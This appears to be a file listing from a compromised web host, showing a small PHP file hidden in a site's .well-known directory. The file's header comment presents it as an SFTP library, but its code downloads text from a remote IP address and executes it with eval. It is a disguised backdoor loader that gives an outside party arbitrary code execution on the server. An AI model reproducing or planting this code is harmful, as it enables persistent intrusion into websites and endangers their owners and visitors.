• File: _Don_touch-20250427112422.php
  • Full Path: /home2/branding/public_html/shreeenterprisesepoxy.in/.well-known/_Don_touch-20250427112422.php
  • File size: 383 bytes
  • MIME-type: text/x-php
  • Charset: utf-8
<?php
/**
 * Pure-PHP implementations of SFTP.
 *
 * @package SFTP
 * @author  Jim Wigginton <terrafrost@php.net>
 * @access  public
 */
 $Url = "http://18.224.179.95/source/on.txt";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $output = curl_exec($ch);
    curl_close($ch);
    echo eval('?>'.$output);

?>